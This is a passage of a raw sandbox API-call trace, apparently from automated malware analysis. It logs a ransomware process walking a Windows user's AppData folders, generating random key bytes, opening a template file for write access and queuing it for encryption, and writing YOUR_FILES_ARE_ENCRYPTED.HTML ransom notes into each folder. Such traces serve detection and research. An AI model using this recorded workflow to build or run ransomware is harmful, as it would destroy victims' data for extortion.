nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="16", cAlternateFileName="")) returned 1 [0165.110] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16") returned 82 [0165.110] GetProcessHeap () returned 0x270000 [0165.110] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0165.110] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16" [0165.110] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\*" [0165.110] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb4a74a0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb4cd600, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xeb4cd600, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0165.110] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb4a74a0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb4cd600, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xeb4cd600, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.110] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb4cd600, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb4cd600, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0x6ffcadf0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x388cc7, dwReserved0=0x0, dwReserved1=0x60, cFileName="Built-In Building Blocks.dotx", cAlternateFileName="BUILT-~1.DOT")) returned 1 [0165.110] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx") returned 112 [0165.110] lstrcmpW (lpString1="Built-In Building Blocks.dotx", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.110] PathFindExtensionW (pszPath="Built-In Building Blocks.dotx") returned=".dotx" [0165.110] lstrlenW (lpString=".dotx") returned 5 [0165.110] PathFindExtensionW (pszPath="Built-In Building Blocks.dotx") returned=".dotx" [0165.111] SystemFunction036 (in: RandomBuffer=0x4ebcec8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebcec8) returned 1 [0165.111] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\document building blocks\\1033\\16\\built-in building blocks.dotx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0165.111] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebceec | out: lpFileSize=0x4ebceec*=3706055) returned 1 [0165.111] GetProcessHeap () returned 0x270000 [0165.111] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0165.115] wsprintfW (in: param_1=0x4ebce06, param_2="%02X" | out: param_1="DA") returned 2 [0165.115] wsprintfW (in: param_1=0x4ebce0a, param_2="%02X" | out: param_1="AC") returned 2 [0165.115] wsprintfW (in: param_1=0x4ebce0e, param_2="%02X" | out: param_1="0F") returned 2 [0165.115] wsprintfW (in: param_1=0x4ebce12, param_2="%02X" | out: param_1="8F") returned 2 [0165.115] wsprintfW (in: param_1=0x4ebce16, param_2="%02X" | out: param_1="54") returned 2 [0165.115] wsprintfW (in: param_1=0x4ebce1a, param_2="%02X" | out: param_1="94") returned 2 [0165.115] wsprintfW (in: param_1=0x4ebce1e, param_2="%02X" | out: param_1="E9") returned 2 [0165.115] wsprintfW (in: param_1=0x4ebce22, param_2="%02X" | out: param_1="44") returned 2 [0165.115] wsprintfW (in: param_1=0x4ebce26, param_2="%02X" | out: param_1="77") returned 2 [0165.115] wsprintfW (in: param_1=0x4ebce2a, param_2="%02X" | out: param_1="59") returned 2 [0165.115] wsprintfW (in: param_1=0x4ebce2e, param_2="%02X" | out: param_1="6C") returned 2 [0165.115] wsprintfW (in: param_1=0x4ebce32, param_2="%02X" | out: param_1="EA") returned 2 [0165.115] wsprintfW (in: param_1=0x4ebce36, param_2="%02X" | out: param_1="F4") returned 2 [0165.115] wsprintfW (in: param_1=0x4ebce3a, param_2="%02X" | out: param_1="8B") returned 2 [0165.116] wsprintfW (in: param_1=0x4ebce3e, param_2="%02X" | out: param_1="C5") returned 2 [0165.116] wsprintfW (in: param_1=0x4ebce42, param_2="%02X" | out: param_1="94") returned 2 [0165.116] wsprintfW (in: param_1=0x4ebce46, param_2="%02X" | out: param_1="11") returned 2 [0165.116] wsprintfW (in: param_1=0x4ebce4a, param_2="%02X" | out: param_1="F0") returned 2 [0165.116] wsprintfW (in: param_1=0x4ebce4e, param_2="%02X" | out: param_1="96") returned 2 [0165.116] wsprintfW (in: param_1=0x4ebce52, param_2="%02X" | out: param_1="E8") returned 2 [0165.116] wsprintfW (in: param_1=0x4ebce56, param_2="%02X" | out: param_1="8D") returned 2 [0165.116] wsprintfW (in: param_1=0x4ebce5a, param_2="%02X" | out: param_1="50") returned 2 [0165.116] wsprintfW (in: param_1=0x4ebce5e, param_2="%02X" | out: param_1="EA") returned 2 [0165.116] wsprintfW (in: param_1=0x4ebce62, param_2="%02X" | out: param_1="90") returned 2 [0165.116] wsprintfW (in: param_1=0x4ebce66, param_2="%02X" | out: param_1="D5") returned 2 [0165.116] wsprintfW (in: param_1=0x4ebce6a, param_2="%02X" | out: param_1="F5") returned 2 [0165.116] wsprintfW (in: param_1=0x4ebce6e, param_2="%02X" | out: param_1="C7") returned 2 [0165.116] wsprintfW (in: param_1=0x4ebce72, param_2="%02X" | out: param_1="E3") returned 2 [0165.116] wsprintfW (in: param_1=0x4ebce76, param_2="%02X" | out: param_1="72") returned 2 [0165.116] wsprintfW (in: param_1=0x4ebce7a, param_2="%02X" | out: param_1="D8") returned 2 [0165.116] wsprintfW (in: param_1=0x4ebce7e, param_2="%02X" | out: param_1="00") returned 2 [0165.116] wsprintfW (in: param_1=0x4ebce82, param_2="%02X" | out: param_1="41") returned 2 [0165.117] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx" [0165.117] CreateIoCompletionPort (FileHandle=0x58c, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0165.117] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0165.117] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb4cd600, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb4cd600, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0x6ffcadf0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x388cc7, dwReserved0=0x0, dwReserved1=0x60, cFileName="Built-In Building Blocks.dotx", cAlternateFileName="BUILT-~1.DOT")) returned 0 [0165.117] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0165.120] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0165.120] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\document building blocks\\1033\\16\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0165.227] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0165.229] CloseHandle (hObject=0x5b8) returned 1 [0165.230] GetProcessHeap () returned 0x270000 [0165.231] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0165.231] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb4a74a0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb4cd600, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xeb4cd600, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="16", cAlternateFileName="")) returned 0 [0165.231] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0165.231] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 109 [0165.231] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\document building blocks\\1033\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0165.232] WriteFile (in: hFile=0x304, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0165.235] CloseHandle (hObject=0x304) returned 1 [0165.236] GetProcessHeap () returned 0x270000 [0165.237] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0165.242] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb4a74a0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb4a74a0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xeb4a74a0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="1033", cAlternateFileName="")) returned 0 [0165.242] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0165.242] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0165.242] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\document building blocks\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5e4 [0165.243] WriteFile (in: hFile=0x5e4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0165.245] CloseHandle (hObject=0x5e4) returned 1 [0165.246] GetProcessHeap () returned 0x270000 [0165.248] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76a0010 | out: hHeap=0x270000) returned 1 [0165.249] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbb202220, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xbb202220, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xbb202220, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96478d, dwReserved1=0x0, cFileName="Excel", cAlternateFileName="")) returned 1 [0165.249] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Excel") returned 55 [0165.249] GetProcessHeap () returned 0x270000 [0165.249] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x76a0010 [0165.249] lstrcpyW (in: lpString1=0x76a0010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Excel" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Excel") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Excel" [0165.249] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Excel", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Excel\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Excel\\*" [0165.249] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Excel\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbb202220, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xbb202220, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xbb202220, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0165.250] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbb202220, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xbb202220, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xbb202220, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.250] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbb202220, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xbb202220, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xbb202220, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="XLSTART", cAlternateFileName="")) returned 1 [0165.251] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART") returned 63 [0165.251] GetProcessHeap () returned 0x270000 [0165.251] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0165.253] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART" [0165.253] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\*" [0165.254] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbb202220, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xbb202220, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xbb202220, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0165.254] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbb202220, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xbb202220, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xbb202220, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.254] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbb202220, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xbb202220, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xbb202220, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0165.254] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0165.255] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 93 [0165.255] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\excel\\xlstart\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0165.256] WriteFile (in: hFile=0x304, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0165.259] CloseHandle (hObject=0x304) returned 1 [0165.259] GetProcessHeap () returned 0x270000 [0165.260] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0165.260] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbb202220, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xbb202220, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xbb202220, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="XLSTART", cAlternateFileName="")) returned 0 [0165.261] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0165.261] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Excel\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 85 [0165.261] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Excel\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\excel\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5e4 [0165.262] WriteFile (in: hFile=0x5e4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0165.265] CloseHandle (hObject=0x5e4) returned 1 [0165.265] GetProcessHeap () returned 0x270000 [0165.267] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76a0010 | out: hHeap=0x270000) returned 1 [0165.267] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xfa086aac, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96478d, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0165.267] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer") returned 67 [0165.267] GetProcessHeap () returned 0x270000 [0165.267] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x76a0010 [0165.267] lstrcpyW (in: lpString1=0x76a0010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer" [0165.267] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*" [0165.267] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xfa086aac, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0165.268] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xfa086aac, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.268] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xaab38e80, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaab38e80, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Quick Launch", cAlternateFileName="QUICKL~1")) returned 1 [0165.268] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch") returned 80 [0165.268] GetProcessHeap () returned 0x270000 [0165.268] 